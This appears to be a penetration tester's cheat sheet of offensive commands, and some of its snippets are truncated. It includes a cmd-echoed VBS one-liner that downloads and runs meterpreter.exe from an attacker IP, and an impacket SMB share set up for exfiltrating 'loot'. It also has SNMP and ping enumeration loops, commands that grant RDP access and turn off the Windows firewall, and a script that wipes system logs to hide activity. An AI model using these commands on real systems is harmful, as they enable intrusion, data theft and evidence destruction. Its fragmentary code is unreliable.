$wc = new-object system.net.WebClient;
$wc.Headers.Add('User-Agent', "This is my agent, there is no one like it...") ;
VBS HTTP File Download
I got stuck with a borked up reverse shell on a Windows system with no file transfer methods and no modern scripting options. I scraped together the following one-liner to dump into my shell to get my payload over by writing a VBS script with echo statements to issue the download:
echo Set o=CreateObject^("MSXML2.XMLHTTP"^):Set a=CreateObject^("ADODB.Stream"^):Set f=Createobject^("Scripting.FileSystemObject"^):o.open "GET", "http://<attacker ip>/meterpreter.exe", 0:o.send^(^):If o.Status=200 Then > "C:\temp\download.vbs" &echo a.Open:a.Type=1:a.Write o.ResponseBody:a.Position=0:If f.Fileexists^("C:\temp\meterpreter.exe"^) Then f.DeleteFile "C:\temp\meterpreter.exe" >> "C:\temp\download.vbs" &echo a.SaveToFile "C:\temp\meterpreter.exe" >>"C:\temp\download.vbs" &echo End if >>"C:\temp\download.vbs" &cscript //B "C:\temp\download.vbs" &del /F /Q "C:\temp\download.vbs"
As always, the impacket suite shines. Use smbserver.py to open an SMB server on your host for file exfiltration:
smbserver.py burmat_exfil ./loot -username burmat -password burmat
## from the target:
PS C:\> net use Q: \\\burmat_exfil /user:burmat burmat
PS C:\> mv .\bh.zip Q:\bh.zip
PS C:\> net use Q: /delete
PERL HTTP File Download
perl -e 'use File::Fetch; my $ff=File::Fetch->new(uri => ""); my $file = $ff->fetch() or die $ff->error;'
Nginx + PUT Request
Picked up from here (thanks @ippsec), you can start a nginx server that can accept PUT requests for file transfer via HTTP:
If you have SQLi with a user account that has FILE privileges, you can use sqlmap to transfer the file to disk without formulating an INFO FILE query yourself:
This one is pretty dirty, and pretty awesome. Run a one-liner on your victim to generate a list of packages (rpmordpkg) on the machine (/tmp/packages.txt). Copy this file to one that has searchsploit, and run the script. Generate the file with:
for ip in $(cat ~/Documents/labs/targets.txt | awk '/^[0-9]/ {print $1}'); do
echo "Performing snmpwalk on public tree for" $ip " - Checking for System Processes"
snmpwalk -c public -v1 $ip > ~/Documents/labs/$ip/scans/systemprocesses.txt
echo "Performing snmpwalk on public tree for" $ip " - Checking for Running Programs"
snmpwalk -c public -v1 $ip > ~/Documents/labs/$ip/scans/runningprograms.txt
echo "Performing snmpwalk on public tree for" $ip " - Checking for Processes Path"
snmpwalk -c public -v1 $ip > ~/Documents/labs/$ip/scans/processespath.txt
echo "Performing snmpwalk on public tree for" $ip " - Checking for Storage Units"
snmpwalk -c public -v1 $ip > ~/Documents/labs/$ip/scans/storageunits.txt
echo "Performing snmpwalk on public tree for" $ip " - Checking for Software Name"
snmpwalk -c public -v1 $ip > ~/Documents/labs/$ip/scans/softwarename.txt
echo "Performing snmpwalk on public tree for" $ip " - Checking for User Accouints"
snmpwalk -c public -v1 $ip > ~/Documents/labs/$ip/scans/useraccounts.txt
echo "Performing snmpwalk on public tree for" $ip " - Checking for TCP Local Ports"
snmpwalk -c public -v1 $ip > ~/Documents/labs/$ip/scans/tcplocalports.txt
echo "Performing snmp-check scan for" $ip
snmp-check $ip > ~/Documents/labs/$ip/scans/snmpcheck.txt
echo "Cleaning up empty files..."
find ~/Documents/labs/$ip/scans/ -size 0 -print0 |xargs -0 rm
Ping Scan
Linux Ping Scanning:
You can use a regular-old for loop:
for i in {1..254}; do ping -c 1 -W 1 172.1.1.$i | grep 'from'; done
Or you can try out the following Python script:
import multiprocessing, subprocess, os
def pinger( job_q, results_q ):
DEVNULL = open(os.devnull,'w')
while True:
ip = job_q.get()
if ip is None: break
if __name__ == '__main__':
pool_size = 255
jobs = multiprocessing.Queue()
results = multiprocessing.Queue()
pool = [ multiprocessing.Process(target=pinger, args=(jobs,results)) for i in range(pool_size) ]
for p in pool:
for i in range(1,255):
for p in pool:
for p in pool:
while not results.empty():
ip = results.get()
Windows Ping Scan:
Not the fastest or the cleanest, but it's an easy way to generate a ping scan from a cmd prompt:
FOR /L %i IN (1,1,254) DO ping -n 1 192.168.1.%i | FIND /i "Reply" >> ips.txt
If you need to add your user to the group, you can use: NET LOCALGROUP "Remote Desktop Users" domain\user /ADD. And if you need to disable the firewall altogether: NetSh Advfirewall set allprofiles state off
Purge Linux Logs
/etc/init.d/sysklogd stop
VARLOGS="auth.log boot btmp daemon.log debug dmesg kern.log mail.info mail.log mail.warn messages syslog udev wtmp"
cd /var/log
for ii in $VARLOGS; do
echo -n > $ii
rm -f $ii.? $ii.?.gz
/etc/init.d/samba stop
rm -f /var/log/samba/*
rm -f /var/lib/dhcp3/*
for ii in /var/log/proftpd/* /var/log/postgresql/* /var/log/apache2/*; do
echo -n > $ii